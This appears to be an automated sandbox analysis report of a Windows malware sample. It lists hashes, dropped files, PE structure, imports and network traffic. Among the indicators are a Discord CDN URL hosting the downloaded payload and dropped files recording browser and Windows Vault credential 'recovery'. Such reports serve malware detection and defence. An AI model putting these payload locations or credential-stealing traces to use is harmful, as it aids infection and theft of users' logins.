SHA-512:	684AB4E29D43F9D9C1B5FE01D30933BC41C78810BBC3B2F75D9CE7FA955851301B4868B455DC2819208DA88FE0D17F7B58BD2B384B2F72CDAB3131EB2C7DF677
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 04282021.DOC.exe, Detection: malicious, Browse Filename: apr.20.confirmaci#U0e02n SWIFT.exe, Detection: malicious, Browse Filename: Factura proforma, nuevo pedido.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:..:..:...^..:...^..:...^..:...^..:..:..:...^..:...^_.:...^..:..Rich.:..........................PE..L...E........................................ ....@..........................`...........@...... ...........................0..x....@.......................P..\.......T............................................0...............................text...<........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..\....P.......$..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Vylsmojatnhhurydzinydclytxebehn[1] Download File
Process:	C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe
File Type:	data
Category:	downloaded
Size (bytes):	441344
Entropy (8bit):	7.050141619754031
Encrypted:	false
SSDEEP:	12288:8TJtLo39BtGicUYmQnCSWmNKZWRyOaypzdKs:8TJCW5mQnC4NK+yOaydZ
MD5:	01FAB0301E3B3BC050E457E954DB9790
SHA1:	1F5406D756C951B726F316FCA927EE43ADDEC5D9
SHA-256:	82E6502C1EF38D2B803EC6EB1F9479740541AFF394A6C0FDE319B332C9752513
SHA-512:	B6AFF8F2C2D5FCAC6CED9DC7FB1CD35CE3F41D43DF1A57EEDC9C1E5A9E6D21E7254DA5734253C52C83C86BDB3F7DD48FDBBEB610283CC2E6A6EEF4D6C04A2839
Malicious:	false
Reputation:	low
IE Cache URL:	https://cdn.discordapp.com/attachments/831802482459672609/839049205866561576/Vylsmojatnhhurydzinydclytxebehn
Preview:	.cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..cc..cccccS..ccsccc.ccc.ccsccceccgcccccccgccccccccSiccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc.1ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc?..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc.1ecc.gcc3eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc

C:\Users\user\AppData\Local\Temp\Adrldefcp\vp21b7dsh.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	4.742830409323469
Encrypted:	false
SSDEEP:	192:zKNdbN1XcCQYb6Q1g7htLtQQkZW8vUzRiW+:z4N1Xcs6Q1g7vOrZW8vUzRiW+
MD5:	174A363BB5A2D88B224546C15DD10906
SHA1:	10D758A2A180829C47360AFD30BE09FB295E6452
SHA-256:	D7EE783F0D00335118F82314239B3A73A6CFCD406E8FAE9C052D620834E897A9
SHA-512:	684AB4E29D43F9D9C1B5FE01D30933BC41C78810BBC3B2F75D9CE7FA955851301B4868B455DC2819208DA88FE0D17F7B58BD2B384B2F72CDAB3131EB2C7DF677
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 04282021.DOC.exe, Detection: malicious, Browse Filename: apr.20.confirmaci#U0e02n SWIFT.exe, Detection: malicious, Browse Filename: Factura proforma, nuevo pedido.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[..:..:..:...^..:...^..:...^..:...^..:..:..:...^..:...^_.:...^..:..Rich.:..........................PE..L...E........................................ ....@..........................`...........@...... ...........................0..x....@.......................P..\.......T............................................0...............................text...<........................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..\....P.......$..............@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogim.jpeg Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	106092
Entropy (8bit):	7.9293420081912815
Encrypted:	false
SSDEEP:	3072:EgWL1SFiBPzUObAoHt2cYVSND8ODvlEJm:fwAFiBYOXNISND82KJm
MD5:	53684258BBC3A4F8FE4DEC7F59A4A96E
SHA1:	69D5FDF59606CBBA497FA7F5ECD2CD94A233712B
SHA-256:	4BCBD79B08AB2A5D1E31D19205049A253FF0FC4FD30872B221DA5D32F7F75123
SHA-512:	CD24D29FFFC63C9DE8BBFDE094D51CB65C0B34919A2B0DB3B99E03B38EE6CF4BCC4C9761676E9D6E70C0CF29126020AAA42E5B4443514DB5159EAE2CC4870BC9
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......<Z5..........\|.w....v...2\|...v<.......7.....................s...u.....g.W......)ky..N...

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrg.ini Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.7883088224543333
Encrypted:	false
SSDEEP:	3:rFGQJhIl:RGQPY
MD5:	4AADF49FED30E4C9B3FE4A3DD6445EBE
SHA1:	1E332822167C6F351B99615EADA2C30A538FF037
SHA-256:	75034BEB7BDED9AEAB5748F4592B9E1419256CAEC474065D43E531EC5CC21C56
SHA-512:	EB5B3908D5E7B43BA02165E092F05578F45F15A148B4C3769036AA542C23A0F7CD2BC2770CF4119A7E437DE3F681D9E398511F69F66824C516D9B451BB95F945
Malicious:	false
Preview:	....C.h.r.o.m.e. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogri.ini Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	2.8420918598895937
Encrypted:	false
SSDEEP:	3:+slXllAGQJhIl:dlIGQPY
MD5:	D63A82E5D81E02E399090AF26DB0B9CB
SHA1:	91D0014C8F54743BBA141FD60C9D963F869D76C9
SHA-256:	EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
SHA-512:	38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
Malicious:	true
Preview:	....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

C:\Users\user\AppData\Roaming\50M6QC82\50Mlogrv.ini Download File
Process:	C:\Windows\SysWOW64\ipconfig.exe
File Type:	data
Category:	dropped
Size (bytes):	210
Entropy (8bit):	3.4775843810946587
Encrypted:	false
SSDEEP:	6:tGQPYlIaExGNlGcQga3Of9y96GO4uUNRQnEoY:MlIaExGNYvOI6x4JNRQZY
MD5:	681496E31D521F47506F016D597066E3
SHA1:	029D95C0973141814C261E4BB35481088AE46670
SHA-256:	7CAE99052E0A7FFA7781324D30152EE6383F79564D9B0627B2C2B5401F291281
SHA-512:	A7D76F01401E048F3561215BAB3D92B80C4594C4DC2C4CA15EEAA3E1D2CC0F96D20498E61B8405B4C88DC43DE978F75AAB425033CC5C75F24A0ED166CC4A2505
Malicious:	true
Preview:	...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.........N.a.m.e.:...M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.t.a.r.g.e.t.=.S.S.O._.P.O.P._.D.e.v.i.c.e.....I.d.:...0.2.u.u.z.f.x.y.r.s.c.v.c.j.b.j.....A.u.t.:.......P.a.s.s.:.......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms Download File
Process:	C:\Windows\explorer.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Directory, ctime=Wed Apr 11 22:38:20 2018, mtime=Tue May 4 09:34:20 2021, atime=Tue May 4 09:34:20 2021, length=8192, window=hide
Category:	modified
Size (bytes):	11904
Entropy (8bit):	3.204139800377744
Encrypted:	false
SSDEEP:	48:8oQcdOvmuosPs+HtdOmkDwdadRZmyQb9sP8B8/JR33dOKJAdWuqsP8AdO9dGttde:8ikt4dRZ0zOxpVWttsdRaxU
MD5:	C1C8C171B97BAEA8DBCE79BC5362991C
SHA1:	BF2CB6FE1128DC8F413DD201CC44F6F3540CCC62
SHA-256:	D6D7F86FFF7F41875BD410B19DC2D9ECAEB33FE577F35990B60B34AAE7B2516E
SHA-512:	247D2D2DDA1E33FEB12730CC3EF3A779CABCFB867CE64C4AA4B9E9029EA77C3DD2E36A9B5DCA084FF0153E6470F84BF384E2B7226B0F284DC7A5AFADF58C1C72
Malicious:	false
Preview:	L..................F...........,....5C...@..5C...@... ...........................P.O. .:i.....+00.../C:\.....................1......RKT..PROGRA~2.........L..RKT....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.......E...............-.......D...........-5.......C:\Program Files (x86)..`.......X.......computer..!a..%.H.VZAj.....KF............!a..%.H.VZAj.....KF...........r.......-...1SPSU(L.y.9K....-........................9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.607613285190326
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	f97e137e_by_Libranalysis.exe
File size:	823808
MD5:	f97e137e249bb393fd88b7dec1ddf9a2
SHA1:	09e3865d681b8670aa9a1ef184c06ca40927d94c
SHA256:	2f2c77d7bcd0fbf80b63b7b2e60b8192130c285bce2f946f021dee83954254e6
SHA512:	de554f995d7d94be652f0e5eb430745fa1329ed06d216b0b107c330831155d737fde91bd74835c3c6bdbf713fa16744fc555a922722886f5aaeb4d65fb0fa014
SSDEEP:	12288:EvDpkleW6jNtAJ1yQU5rl0yQso4e1cR4NvHaGgX6r/o75U/Oy/6:E7O4p/81yQU5rl0yPoKeNvajqeUD/
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	b464e4d0f0d8cc60

Static PE Info

General
Entrypoint:	0x47d8bc
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d2b6753f310b2222d9c1c0b1c05cd168

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0047C798h
call 00007F95A0DDAC81h
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
call 00007F95A0E3136Dh
mov ecx, dword ptr [00480588h]
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0047C498h]
call 00007F95A0E3136Dh
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
mov byte ptr [eax+5Bh], 00000000h
mov eax, dword ptr [00480470h]
mov eax, dword ptr [eax]
call 00007F95A0E313D6h
call 00007F95A0DD89B1h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85000	0x2af8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x92000	0x3f87c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x79f0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x89000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x85804	0x6b0	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7ba00	0x7ba00	False	0.527276605157	data	6.56483916591	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.itext	0x7d000	0x90c	0xa00	False	0.570703125	data	5.87539197111	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x7e000	0x2628	0x2800	False	0.41904296875	data	4.25537935929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0x81000	0x37a4	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x85000	0x2af8	0x2c00	False	0.3154296875	data	4.92302569	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x88000	0x34	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x89000	0x18	0x200	False	0.05078125	data	0.210826267787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x79f0	0x7a00	False	0.617379610656	data	6.69027870105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x92000	0x3f87c	0x3fa00	False	0.327319192043	data	5.46987141328	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x92864	0x134	data	English	United States
RT_CURSOR	0x92998	0x134	data	English	United States
RT_CURSOR	0x92acc	0x134	data	English	United States
RT_CURSOR	0x92c00	0x134	data	English	United States
RT_CURSOR	0x92d34	0x134	data	English	United States
RT_CURSOR	0x92e68	0x134	data	English	United States
RT_CURSOR	0x92f9c	0x134	data	English	United States
RT_ICON	0x930d0	0x94a8	data	English	United States
RT_MENU	0x9c578	0x20	data	English	United States
RT_DIALOG	0x9c598	0x52	data
RT_DIALOG	0x9c5ec	0x52	data
RT_STRING	0x9c640	0x3d4	data
RT_STRING	0x9ca14	0x344	data
RT_STRING	0x9cd58	0xa0	data
RT_STRING	0x9cdf8	0xdc	data
RT_STRING	0x9ced4	0x100	data
RT_STRING	0x9cfd4	0x434	data
RT_STRING	0x9d408	0x390	data
RT_STRING	0x9d798	0x370	data
RT_STRING	0x9db08	0x3cc	data
RT_STRING	0x9ded4	0x214	data
RT_STRING	0x9e0e8	0xcc	data
RT_STRING	0x9e1b4	0x194	data
RT_STRING	0x9e348	0x3c4	data
RT_STRING	0x9e70c	0x338	data
RT_STRING	0x9ea44	0x294	data
RT_RCDATA	0x9ecd8	0x10	data
RT_RCDATA	0x9ece8	0x2c67b	PC bitmap, Windows 3.x format, 225 x 225 x 4	English	United States
RT_RCDATA	0xcb364	0x719	Delphi compiled form 'TForm1'
RT_RCDATA	0xcba80	0x5d5a	Delphi compiled form 'TScreenLogoFrm'
RT_GROUP_CURSOR	0xd17dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd17f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1804	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1818	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd182c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1840	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0xd1854	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0xd1868	0x14	data	English	United States

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPolyFillMode, GetPixel, GetPaletteEntries, GetObjectA, GetGraphicsMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetDCPenColor, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkMode, GetBkColor, GetBitmapBits, GdiFlush, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProfileStringA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
winspool.drv	OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 12:32:26.260426044 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.314181089 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.314333916 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.331393003 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.383546114 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.384655952 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.384680033 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.384752989 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.384779930 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.491626978 CEST	49739	443	192.168.2.4	162.159.134.233
May 4, 2021 12:32:26.543354988 CEST	443	49739	162.159.134.233	192.168.2.4
May 4, 2021 12:32:26.543982029 CEST	443	49739	162.159.134.233	192.168.2.4
